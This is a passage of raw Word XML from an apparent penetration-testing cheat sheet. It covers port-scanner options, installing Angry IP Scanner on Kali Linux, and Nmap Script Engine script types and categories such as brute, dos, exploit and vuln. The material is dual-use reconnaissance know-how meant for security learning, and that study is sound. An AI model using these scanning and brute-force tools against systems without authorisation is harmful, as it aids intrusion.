            <w:r w:rsidRPr="002F66D3">
              <w:rPr>
                <w:color w:val="00B0F0"/>
              </w:rPr>
              <w:t>-e</w:t>
            </w:r>
            <w:r>
              <w:t xml:space="preserve"> </w:t>
            </w:r>
            <w:r w:rsidRPr="002F66D3">
              <w:rPr>
                <w:color w:val="00B050"/>
              </w:rPr>
              <w:t>tun0</w:t>
            </w:r>
            <w:r>
              <w:t xml:space="preserve"> </w:t>
            </w:r>
            <w:r w:rsidRPr="002F66D3">
              <w:rPr>
                <w:color w:val="00B0F0"/>
              </w:rPr>
              <w:t>--rate=</w:t>
            </w:r>
            <w:r w:rsidRPr="002F66D3">
              <w:rPr>
                <w:color w:val="00B050"/>
              </w:rPr>
              <w:t>1000</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="673DBD07" w14:textId="77777777" w:rsidR="006374E8" w:rsidRDefault="006374E8" w:rsidP="002024A0">
            <w:r>
              <w:rPr>
                <w:color w:val="00B050"/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r w:rsidRPr="006374E8">
              <w:rPr>
                <w:color w:val="00B0F0"/>
              </w:rPr>
              <w:t>-e</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:color w:val="00B050"/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r w:rsidRPr="006374E8">
              <w:t>Must be used when on a VPN connection</w:t>
            </w:r>
            <w:r>
              <w:t xml:space="preserve"> to specify the port.</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="771B8872" w14:textId="6443242E" w:rsidR="006374E8" w:rsidRDefault="006374E8" w:rsidP="002024A0">
            <w:r>
              <w:tab/>
            </w:r>
            <w:r w:rsidRPr="006374E8">
              <w:rPr>
                <w:color w:val="00B0F0"/>
              </w:rPr>
              <w:t xml:space="preserve">--iflist </w:t>
            </w:r>
            <w:r>
              <w:tab/>
              <w:t>L</w:t>
            </w:r>
            <w:r w:rsidRPr="006374E8">
              <w:t>ist</w:t>
            </w:r>
            <w:r>
              <w:t>s</w:t>
            </w:r>
            <w:r w:rsidRPr="006374E8">
              <w:t xml:space="preserve"> the available network interfaces, and then exits.</w:t>
            </w:r>
            <w:r>
              <w:br/>
            </w:r>
            <w:r>
              <w:tab/>
            </w:r>
            <w:r w:rsidRPr="00DD0D02">
              <w:rPr>
                <w:color w:val="00B0F0"/>
              </w:rPr>
              <w:t>--open-only</w:t>
            </w:r>
            <w:r>
              <w:tab/>
            </w:r>
            <w:r w:rsidRPr="006374E8">
              <w:t xml:space="preserve"> </w:t>
            </w:r>
            <w:r>
              <w:t>R</w:t>
            </w:r>
            <w:r w:rsidRPr="006374E8">
              <w:t>eport only open ports, not closed ports.</w:t>
            </w:r>
            <w:r w:rsidR="00DD0D02">
              <w:br/>
            </w:r>
            <w:r w:rsidR="00DD0D02">
              <w:tab/>
            </w:r>
            <w:r w:rsidR="00DD0D02" w:rsidRPr="00DD0D02">
              <w:rPr>
                <w:color w:val="00B0F0"/>
              </w:rPr>
              <w:t>--interactive</w:t>
            </w:r>
            <w:r w:rsidR="00DD0D02">
              <w:tab/>
              <w:t>S</w:t>
            </w:r>
            <w:r w:rsidR="00DD0D02" w:rsidRPr="00DD0D02">
              <w:t xml:space="preserve">how the results in </w:t>
            </w:r>
            <w:r w:rsidR="002024A0" w:rsidRPr="00DD0D02">
              <w:t>real-time</w:t>
            </w:r>
            <w:r w:rsidR="00DD0D02" w:rsidRPr="00DD0D02">
              <w:t xml:space="preserve"> on the console.</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="3B22BC5F" w14:textId="77777777" w:rsidR="000A5D49" w:rsidRDefault="000A5D49" w:rsidP="002024A0">
            <w:r>
              <w:tab/>
            </w:r>
            <w:r w:rsidRPr="000A5D49">
              <w:rPr>
                <w:color w:val="00B0F0"/>
              </w:rPr>
              <w:t>--ping</w:t>
            </w:r>
            <w:r>
              <w:tab/>
            </w:r>
            <w:r>
              <w:tab/>
              <w:t>Do an ICMP scan</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="5B32E09C" w14:textId="0939F574" w:rsidR="000A5D49" w:rsidRDefault="000A5D49" w:rsidP="002024A0">
            <w:r>
              <w:tab/>
            </w:r>
            <w:r w:rsidRPr="00051956">
              <w:rPr>
                <w:color w:val="00B0F0"/>
              </w:rPr>
              <w:t xml:space="preserve">--wait </w:t>
            </w:r>
            <w:r w:rsidRPr="00051956">
              <w:rPr>
                <w:color w:val="00B050"/>
              </w:rPr>
              <w:t>#</w:t>
            </w:r>
            <w:r w:rsidRPr="00051956">
              <w:rPr>
                <w:color w:val="00B050"/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r>
              <w:tab/>
            </w:r>
            <w:r w:rsidR="002024A0">
              <w:t>Specify</w:t>
            </w:r>
            <w:r w:rsidR="00051956">
              <w:t xml:space="preserve"> how long the program should wait before terminating.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00EF1B7E" w14:paraId="5543C963" w14:textId="77777777" w:rsidTr="00581287">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="611" w:type="dxa"/>
            <w:tcBorders>
              <w:left w:val="single" w:sz="24" w:space="0" w:color="auto"/>
              <w:right w:val="single" w:sz="12" w:space="0" w:color="auto"/>
            </w:tcBorders>
            <w:shd w:val="clear" w:color="auto" w:fill="BDD6EE" w:themeFill="accent5" w:themeFillTint="66"/>
          </w:tcPr>
          <w:p w14:paraId="1951E3C8" w14:textId="28D31249" w:rsidR="00EF1B7E" w:rsidRDefault="00EF1B7E" w:rsidP="002024A0">
            <w:r>
              <w:t>41.</w:t>
            </w:r>
            <w:r w:rsidR="00C54115">
              <w:t>e</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2390" w:type="dxa"/>
            <w:tcBorders>
              <w:left w:val="single" w:sz="12" w:space="0" w:color="auto"/>
              <w:right w:val="single" w:sz="12" w:space="0" w:color="auto"/>
            </w:tcBorders>
            <w:shd w:val="clear" w:color="auto" w:fill="DEEAF6" w:themeFill="accent5" w:themeFillTint="33"/>
          </w:tcPr>
          <w:p w14:paraId="759C3470" w14:textId="3A43A033" w:rsidR="00EF1B7E" w:rsidRDefault="00EF1B7E" w:rsidP="002024A0">
            <w:pPr>
              <w:jc w:val="center"/>
            </w:pPr>
            <w:r>
              <w:t>Angry IP Scanner</w:t>
            </w:r>
            <w:r>
              <w:br/>
            </w:r>
            <w:r w:rsidRPr="00EF1B7E">
              <w:rPr>
                <w:i/>
                <w:iCs/>
              </w:rPr>
              <w:t>(Angry IP Scanner isn’t installed by default on Kali Linux)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="8026" w:type="dxa"/>
            <w:tcBorders>
              <w:left w:val="single" w:sz="12" w:space="0" w:color="auto"/>
              <w:right w:val="single" w:sz="24" w:space="0" w:color="auto"/>
            </w:tcBorders>
          </w:tcPr>
          <w:p w14:paraId="0494A327" w14:textId="63781C9A" w:rsidR="00581287" w:rsidRPr="00581287" w:rsidRDefault="00EF1B7E" w:rsidP="002024A0">
            <w:r>
              <w:t>Download the DEB Package file from https://angryip.org/download/#linux.</w:t>
            </w:r>
            <w:r>
              <w:br/>
              <w:t xml:space="preserve">Next, </w:t>
            </w:r>
            <w:r w:rsidRPr="00EF1B7E">
              <w:rPr>
                <w:color w:val="FF0000"/>
              </w:rPr>
              <w:t xml:space="preserve">cd </w:t>
            </w:r>
            <w:r>
              <w:t xml:space="preserve">to the directory the folder has been saved to (likely </w:t>
            </w:r>
            <w:r w:rsidRPr="00EF1B7E">
              <w:rPr>
                <w:color w:val="00B050"/>
              </w:rPr>
              <w:t>Downloads</w:t>
            </w:r>
            <w:r>
              <w:t>) and use:</w:t>
            </w:r>
            <w:r>
              <w:br/>
            </w:r>
            <w:r>
              <w:tab/>
            </w:r>
            <w:r w:rsidRPr="00EF1B7E">
              <w:rPr>
                <w:color w:val="FF0000"/>
                <w:u w:val="single"/>
              </w:rPr>
              <w:t>sudo</w:t>
            </w:r>
            <w:r w:rsidRPr="00EF1B7E">
              <w:rPr>
                <w:color w:val="FF0000"/>
              </w:rPr>
              <w:t xml:space="preserve"> dpkg </w:t>
            </w:r>
            <w:r w:rsidRPr="00EF1B7E">
              <w:rPr>
                <w:color w:val="00B0F0"/>
              </w:rPr>
              <w:t>-i</w:t>
            </w:r>
            <w:r w:rsidRPr="00EF1B7E">
              <w:t xml:space="preserve"> </w:t>
            </w:r>
            <w:r w:rsidRPr="00EF1B7E">
              <w:rPr>
                <w:color w:val="00B050"/>
              </w:rPr>
              <w:t>ipscan_3.7.6_amd64.deb</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:color w:val="00B050"/>
              </w:rPr>
              <w:br/>
            </w:r>
            <w:r w:rsidRPr="00EF1B7E">
              <w:t xml:space="preserve">Now, you can enter </w:t>
            </w:r>
            <w:r w:rsidRPr="00EF1B7E">
              <w:rPr>
                <w:color w:val="FF0000"/>
              </w:rPr>
              <w:t xml:space="preserve">ipscan </w:t>
            </w:r>
            <w:r w:rsidRPr="00EF1B7E">
              <w:t>to open the application.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="002F66D3" w14:paraId="2DEB85FD" w14:textId="77777777" w:rsidTr="00581287">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="611" w:type="dxa"/>
            <w:tcBorders>
              <w:left w:val="single" w:sz="24" w:space="0" w:color="auto"/>
              <w:bottom w:val="single" w:sz="24" w:space="0" w:color="auto"/>
              <w:right w:val="single" w:sz="12" w:space="0" w:color="auto"/>
            </w:tcBorders>
            <w:shd w:val="clear" w:color="auto" w:fill="C5E0B3" w:themeFill="accent6" w:themeFillTint="66"/>
          </w:tcPr>
          <w:p w14:paraId="4B5686EF" w14:textId="4B2D6C62" w:rsidR="002F66D3" w:rsidRDefault="002F66D3" w:rsidP="002024A0"/>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2390" w:type="dxa"/>
            <w:tcBorders>
              <w:left w:val="single" w:sz="12" w:space="0" w:color="auto"/>
              <w:bottom w:val="single" w:sz="24" w:space="0" w:color="auto"/>
              <w:right w:val="single" w:sz="12" w:space="0" w:color="auto"/>
            </w:tcBorders>
            <w:shd w:val="clear" w:color="auto" w:fill="E2EFD9" w:themeFill="accent6" w:themeFillTint="33"/>
          </w:tcPr>
          <w:p w14:paraId="51834DF3" w14:textId="77777777" w:rsidR="002F66D3" w:rsidRDefault="002F66D3" w:rsidP="002024A0">
            <w:pPr>
              <w:jc w:val="center"/>
            </w:pPr>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="8026" w:type="dxa"/>
            <w:tcBorders>
              <w:left w:val="single" w:sz="12" w:space="0" w:color="auto"/>
              <w:bottom w:val="single" w:sz="24" w:space="0" w:color="auto"/>
              <w:right w:val="single" w:sz="24" w:space="0" w:color="auto"/>
            </w:tcBorders>
          </w:tcPr>
          <w:p w14:paraId="355235ED" w14:textId="238DD1C5" w:rsidR="002F66D3" w:rsidRPr="000C65EE" w:rsidRDefault="002F66D3" w:rsidP="002024A0"/>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="23A799FE" w14:textId="42B6C545" w:rsidR="0050130C" w:rsidRDefault="0050130C">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="majorHAnsi" w:cstheme="majorBidi"/>
          <w:color w:val="2F5496" w:themeColor="accent1" w:themeShade="BF"/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="292CC631" w14:textId="78BAADE5" w:rsidR="00406CC8" w:rsidRDefault="00581287" w:rsidP="0050130C">
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
      </w:pPr>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t xml:space="preserve">Port, Service and Web Page Scanning: </w:t>
      </w:r>
      <w:r w:rsidR="00F4574C">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Nmap Script Engin</w:t>
      </w:r>
      <w:r w:rsidR="005D321C">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>e</w:t>
      </w:r>
    </w:p>
    <w:tbl>
      <w:tblPr>
        <w:tblStyle w:val="TableGrid"/>
        <w:tblpPr w:leftFromText="180" w:rightFromText="180" w:tblpY="698"/>
        <w:tblW w:w="11027" w:type="dxa"/>
        <w:tblLook w:val="04A0" w:firstRow="1" w:lastRow="0" w:firstColumn="1" w:lastColumn="0" w:noHBand="0" w:noVBand="1"/>
      </w:tblPr>
      <w:tblGrid>
        <w:gridCol w:w="611"/>
        <w:gridCol w:w="2392"/>
        <w:gridCol w:w="8024"/>
      </w:tblGrid>
      <w:tr w:rsidR="00235FF8" w14:paraId="7FE5E8EE" w14:textId="77777777" w:rsidTr="00F2233F">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="611" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="single" w:sz="24" w:space="0" w:color="auto"/>
              <w:left w:val="single" w:sz="24" w:space="0" w:color="auto"/>
              <w:bottom w:val="single" w:sz="8" w:space="0" w:color="auto"/>
              <w:right w:val="single" w:sz="12" w:space="0" w:color="auto"/>
            </w:tcBorders>
            <w:shd w:val="clear" w:color="auto" w:fill="C5E0B3" w:themeFill="accent6" w:themeFillTint="66"/>
          </w:tcPr>
          <w:p w14:paraId="3046DBF9" w14:textId="77777777" w:rsidR="00235FF8" w:rsidRDefault="00235FF8" w:rsidP="00F2233F">
            <w:r>
              <w:t>42.a</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2392" w:type="dxa"/>
            <w:vMerge w:val="restart"/>
            <w:tcBorders>
              <w:top w:val="single" w:sz="24" w:space="0" w:color="auto"/>
              <w:left w:val="single" w:sz="12" w:space="0" w:color="auto"/>
              <w:right w:val="single" w:sz="12" w:space="0" w:color="auto"/>
            </w:tcBorders>
            <w:shd w:val="clear" w:color="auto" w:fill="E2EFD9" w:themeFill="accent6" w:themeFillTint="33"/>
          </w:tcPr>
          <w:p w14:paraId="2971BD32" w14:textId="5830BD54" w:rsidR="00235FF8" w:rsidRPr="00F4574C" w:rsidRDefault="00235FF8" w:rsidP="00F2233F">
            <w:pPr>
              <w:jc w:val="center"/>
            </w:pPr>
            <w:r w:rsidRPr="00F4574C">
              <w:t>nmap</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="8024" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="single" w:sz="24" w:space="0" w:color="auto"/>
              <w:left w:val="single" w:sz="12" w:space="0" w:color="auto"/>
              <w:bottom w:val="single" w:sz="6" w:space="0" w:color="auto"/>
              <w:right w:val="single" w:sz="24" w:space="0" w:color="auto"/>
            </w:tcBorders>
          </w:tcPr>
          <w:p w14:paraId="6F685710" w14:textId="77777777" w:rsidR="00235FF8" w:rsidRDefault="00235FF8" w:rsidP="00F2233F">
            <w:pPr>
              <w:rPr>
                <w:color w:val="00B050"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00F4574C">
              <w:t xml:space="preserve">To active </w:t>
            </w:r>
            <w:proofErr w:type="gramStart"/>
            <w:r w:rsidRPr="00F4574C">
              <w:t>an</w:t>
            </w:r>
            <w:proofErr w:type="gramEnd"/>
            <w:r w:rsidRPr="00F4574C">
              <w:t xml:space="preserve"> nmap script, you must specifiy it as part of the nmap command using:</w:t>
            </w:r>
            <w:r w:rsidRPr="00F4574C">
              <w:br/>
            </w:r>
            <w:r w:rsidRPr="00F4574C">
              <w:tab/>
            </w:r>
            <w:r w:rsidRPr="00F4574C">
              <w:rPr>
                <w:color w:val="00B0F0"/>
              </w:rPr>
              <w:t xml:space="preserve">--script </w:t>
            </w:r>
            <w:r w:rsidRPr="00F4574C">
              <w:rPr>
                <w:color w:val="00B050"/>
              </w:rPr>
              <w:t>SCRIPT-NAME</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="734D84A0" w14:textId="1A6521A5" w:rsidR="00235FF8" w:rsidRPr="00F4574C" w:rsidRDefault="00235FF8" w:rsidP="00F2233F">
            <w:r>
              <w:t>When we talk about writing NSE scripts, there are four different types that can help us enhance the default Nmap features, depending on the target and the scanning phase in which they are run:</w:t>
            </w:r>
            <w:r>
              <w:br/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
              </w:rPr>
              <w:t>●</w:t>
            </w:r>
            <w:r>
              <w:t>Prerule scripts: These types of scripts run before the rest of any scanning operation, while Nmap doesn’t have any data about the remote target.</w:t>
            </w:r>
            <w:r>
              <w:br/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
              </w:rPr>
              <w:t>●</w:t>
            </w:r>
            <w:r>
              <w:t>Host scripts: Once the Nmap default scan has finished the host exploration, detection, port scanning or software discovery, it will perform the host scripts.</w:t>
            </w:r>
            <w:r>
              <w:br/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
              </w:rPr>
              <w:t>●</w:t>
            </w:r>
            <w:r>
              <w:t>Service scripts: These are a particular set of Nmap scripts that are run against services on the remote host. These include http service scripts, for example, which can be run against web servers.</w:t>
            </w:r>
            <w:r>
              <w:br/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
              </w:rPr>
              <w:t>●</w:t>
            </w:r>
            <w:r>
              <w:t>Postrule scripts: These are run after the entire Nmap scan has finished, and are often useful for parsing, formatting and presenting the different results.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00235FF8" w14:paraId="13BB43A2" w14:textId="77777777" w:rsidTr="00F2233F">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="611" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="single" w:sz="8" w:space="0" w:color="auto"/>
              <w:left w:val="single" w:sz="24" w:space="0" w:color="auto"/>
              <w:right w:val="single" w:sz="12" w:space="0" w:color="auto"/>
            </w:tcBorders>
            <w:shd w:val="clear" w:color="auto" w:fill="C5E0B3" w:themeFill="accent6" w:themeFillTint="66"/>
          </w:tcPr>
          <w:p w14:paraId="4C931AB7" w14:textId="5822D239" w:rsidR="00235FF8" w:rsidRDefault="00235FF8" w:rsidP="00F2233F">
            <w:r>
              <w:t>42.b</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2392" w:type="dxa"/>
            <w:vMerge/>
            <w:tcBorders>
              <w:left w:val="single" w:sz="12" w:space="0" w:color="auto"/>
              <w:right w:val="single" w:sz="12" w:space="0" w:color="auto"/>
            </w:tcBorders>
            <w:shd w:val="clear" w:color="auto" w:fill="E2EFD9" w:themeFill="accent6" w:themeFillTint="33"/>
          </w:tcPr>
          <w:p w14:paraId="4274B553" w14:textId="77777777" w:rsidR="00235FF8" w:rsidRPr="00F4574C" w:rsidRDefault="00235FF8" w:rsidP="00F2233F">
            <w:pPr>
              <w:jc w:val="center"/>
            </w:pPr>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="8024" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="single" w:sz="6" w:space="0" w:color="auto"/>
              <w:left w:val="single" w:sz="12" w:space="0" w:color="auto"/>
              <w:right w:val="single" w:sz="24" w:space="0" w:color="auto"/>
            </w:tcBorders>
          </w:tcPr>
          <w:p w14:paraId="45590FE8" w14:textId="58F6EEE9" w:rsidR="00235FF8" w:rsidRDefault="00235FF8" w:rsidP="00F2233F">
            <w:r w:rsidRPr="00406CC8">
              <w:rPr>
                <w:b/>
                <w:bCs/>
                <w:u w:val="single"/>
              </w:rPr>
              <w:t>Nmap Script Name</w:t>
            </w:r>
            <w:r>
              <w:t xml:space="preserve"> </w:t>
            </w:r>
            <w:r>
              <w:tab/>
            </w:r>
            <w:r>
              <w:tab/>
            </w:r>
            <w:r w:rsidRPr="00406CC8">
              <w:rPr>
                <w:b/>
                <w:bCs/>
                <w:u w:val="single"/>
              </w:rPr>
              <w:t>Description</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="04C41FCF" w14:textId="6F70020C" w:rsidR="00235FF8" w:rsidRDefault="00235FF8" w:rsidP="00F2233F">
            <w:r w:rsidRPr="005D321C">
              <w:rPr>
                <w:color w:val="00B050"/>
              </w:rPr>
              <w:t xml:space="preserve">auth </w:t>
            </w:r>
            <w:r>
              <w:tab/>
            </w:r>
            <w:r>
              <w:tab/>
              <w:t>All sorts of authentication and user privilege scripts</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="73050A95" w14:textId="6CC3D7F5" w:rsidR="00235FF8" w:rsidRDefault="00235FF8" w:rsidP="00F2233F">
            <w:r w:rsidRPr="005D321C">
              <w:rPr>
                <w:color w:val="00B050"/>
              </w:rPr>
              <w:t>broadcast</w:t>
            </w:r>
            <w:r>
              <w:t xml:space="preserve"> </w:t>
            </w:r>
            <w:r>
              <w:tab/>
              <w:t>Network discovery scripts- use broadcast petitions for intel gathering</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="2373F3C9" w14:textId="363FD41E" w:rsidR="00235FF8" w:rsidRDefault="00235FF8" w:rsidP="00F2233F">
            <w:r w:rsidRPr="005D321C">
              <w:rPr>
                <w:color w:val="00B050"/>
              </w:rPr>
              <w:t xml:space="preserve">brute </w:t>
            </w:r>
            <w:r>
              <w:tab/>
            </w:r>
            <w:r>
              <w:tab/>
              <w:t>Set of scripts for brute force attacking to guess access credentials</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="325C3106" w14:textId="49B94C67" w:rsidR="00235FF8" w:rsidRDefault="00235FF8" w:rsidP="00F2233F">
            <w:r w:rsidRPr="005D321C">
              <w:rPr>
                <w:color w:val="00B050"/>
              </w:rPr>
              <w:t xml:space="preserve">default </w:t>
            </w:r>
            <w:r w:rsidRPr="005D321C">
              <w:rPr>
                <w:color w:val="00B050"/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r>
              <w:tab/>
              <w:t xml:space="preserve">The most popular Nmap scripts, using </w:t>
            </w:r>
            <w:r w:rsidRPr="00406CC8">
              <w:rPr>
                <w:color w:val="00B0F0"/>
              </w:rPr>
              <w:t xml:space="preserve">-sC </w:t>
            </w:r>
            <w:r>
              <w:t>by default</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="15D18634" w14:textId="77777777" w:rsidR="00235FF8" w:rsidRDefault="00235FF8" w:rsidP="00F2233F">
            <w:r w:rsidRPr="005D321C">
              <w:rPr>
                <w:color w:val="00B050"/>
              </w:rPr>
              <w:t xml:space="preserve">discovery </w:t>
            </w:r>
            <w:r>
              <w:tab/>
              <w:t>Scripts related to network, service and host discovery</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="22163642" w14:textId="51E9DAAC" w:rsidR="00235FF8" w:rsidRDefault="00235FF8" w:rsidP="00F2233F">
            <w:r w:rsidRPr="005D321C">
              <w:rPr>
                <w:color w:val="00B050"/>
              </w:rPr>
              <w:t xml:space="preserve">dos </w:t>
            </w:r>
            <w:r>
              <w:tab/>
            </w:r>
            <w:r>
              <w:tab/>
              <w:t>Denial of service scripts used to test and perform DOS and floods</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="492C52C0" w14:textId="1376DF84" w:rsidR="00235FF8" w:rsidRDefault="00235FF8" w:rsidP="00F2233F">
            <w:r w:rsidRPr="005D321C">
              <w:rPr>
                <w:color w:val="00B050"/>
              </w:rPr>
              <w:t xml:space="preserve">exploit </w:t>
            </w:r>
            <w:r w:rsidRPr="005D321C">
              <w:rPr>
                <w:color w:val="00B050"/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r>
              <w:tab/>
              <w:t>Used to perform service exploitation on different CVEs</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="446F623F" w14:textId="77777777" w:rsidR="00235FF8" w:rsidRDefault="00235FF8" w:rsidP="00F2233F">
            <w:r w:rsidRPr="005D321C">
              <w:rPr>
                <w:color w:val="00B050"/>
              </w:rPr>
              <w:t xml:space="preserve">external </w:t>
            </w:r>
            <w:r>
              <w:tab/>
              <w:t>Scripts that rely on 3rd party services or data</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="0018E435" w14:textId="52697510" w:rsidR="00235FF8" w:rsidRDefault="00235FF8" w:rsidP="00F2233F">
            <w:r w:rsidRPr="005D321C">
              <w:rPr>
                <w:color w:val="00B050"/>
              </w:rPr>
              <w:t xml:space="preserve">fuzzer </w:t>
            </w:r>
            <w:r>
              <w:tab/>
            </w:r>
            <w:r>
              <w:tab/>
              <w:t>Used to perform fussing attacks against apps, services or networks</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="55F76625" w14:textId="77777777" w:rsidR="00235FF8" w:rsidRDefault="00235FF8" w:rsidP="00F2233F">
            <w:r w:rsidRPr="005D321C">
              <w:rPr>
                <w:color w:val="00B050"/>
              </w:rPr>
              <w:t xml:space="preserve">intrusive </w:t>
            </w:r>
            <w:r>
              <w:tab/>
              <w:t>All the ‘aggressive’ scripts that cause a lot of network noise</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="0F168FAF" w14:textId="77777777" w:rsidR="00235FF8" w:rsidRDefault="00235FF8" w:rsidP="00F2233F">
            <w:r w:rsidRPr="005D321C">
              <w:rPr>
                <w:color w:val="00B050"/>
              </w:rPr>
              <w:t xml:space="preserve">malware </w:t>
            </w:r>
            <w:r>
              <w:tab/>
              <w:t>Malware detections and exploration scripts</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="6F92DF73" w14:textId="32BCC3CD" w:rsidR="00235FF8" w:rsidRDefault="00235FF8" w:rsidP="00F2233F">
            <w:r w:rsidRPr="005D321C">
              <w:rPr>
                <w:color w:val="00B050"/>
              </w:rPr>
              <w:t xml:space="preserve">safe </w:t>
            </w:r>
            <w:r>
              <w:tab/>
            </w:r>
            <w:r>
              <w:tab/>
              <w:t>Safe and non-intrusive/noisy scripts</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="7093256D" w14:textId="0EB052E9" w:rsidR="00235FF8" w:rsidRDefault="00235FF8" w:rsidP="00F2233F">
            <w:r w:rsidRPr="005D321C">
              <w:rPr>
                <w:color w:val="00B050"/>
              </w:rPr>
              <w:t>version</w:t>
            </w:r>
            <w:r>
              <w:t xml:space="preserve"> </w:t>
            </w:r>
            <w:r>
              <w:tab/>
            </w:r>
            <w:r>
              <w:tab/>
              <w:t>OS, service and software detection scripts</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="125CF8A3" w14:textId="2CDDEDC2" w:rsidR="00235FF8" w:rsidRPr="00F4574C" w:rsidRDefault="00235FF8" w:rsidP="00F2233F">
            <w:r w:rsidRPr="005D321C">
              <w:rPr>
                <w:color w:val="00B050"/>
              </w:rPr>
              <w:t xml:space="preserve">vuln </w:t>
            </w:r>
            <w:r>
              <w:tab/>
            </w:r>
            <w:r>
              <w:tab/>
              <w:t>Includes vulnerability detection and exploitation scripts</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00235FF8" w14:paraId="5708A40B" w14:textId="77777777" w:rsidTr="00F2233F">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="611" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="single" w:sz="8" w:space="0" w:color="auto"/>
              <w:left w:val="single" w:sz="24" w:space="0" w:color="auto"/>
              <w:right w:val="single" w:sz="12" w:space="0" w:color="auto"/>
            </w:tcBorders>
            <w:shd w:val="clear" w:color="auto" w:fill="C5E0B3" w:themeFill="accent6" w:themeFillTint="66"/>
          </w:tcPr>
          <w:p w14:paraId="51E7B17F" w14:textId="2BB76DEF" w:rsidR="00235FF8" w:rsidRDefault="00235FF8" w:rsidP="00F2233F">
            <w:r>
              <w:t>42.c</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2392" w:type="dxa"/>
            <w:vMerge/>
            <w:tcBorders>
              <w:left w:val="single" w:sz="12" w:space="0" w:color="auto"/>
              <w:right w:val="single" w:sz="12" w:space="0" w:color="auto"/>
            </w:tcBorders>
            <w:shd w:val="clear" w:color="auto" w:fill="E2EFD9" w:themeFill="accent6" w:themeFillTint="33"/>
          </w:tcPr>
          <w:p w14:paraId="409137F8" w14:textId="77777777" w:rsidR="00235FF8" w:rsidRPr="00F4574C" w:rsidRDefault="00235FF8" w:rsidP="00F2233F">
            <w:pPr>
              <w:jc w:val="center"/>
            </w:pPr>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="8024" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="single" w:sz="6" w:space="0" w:color="auto"/>
              <w:left w:val="single" w:sz="12" w:space="0" w:color="auto"/>
              <w:right w:val="single" w:sz="24" w:space="0" w:color="auto"/>
            </w:tcBorders>
          </w:tcPr>
          <w:p w14:paraId="48F754A5" w14:textId="427D1783" w:rsidR="00235FF8" w:rsidRPr="005D321C" w:rsidRDefault="00235FF8" w:rsidP="00F2233F">
            <w:r w:rsidRPr="005D321C">
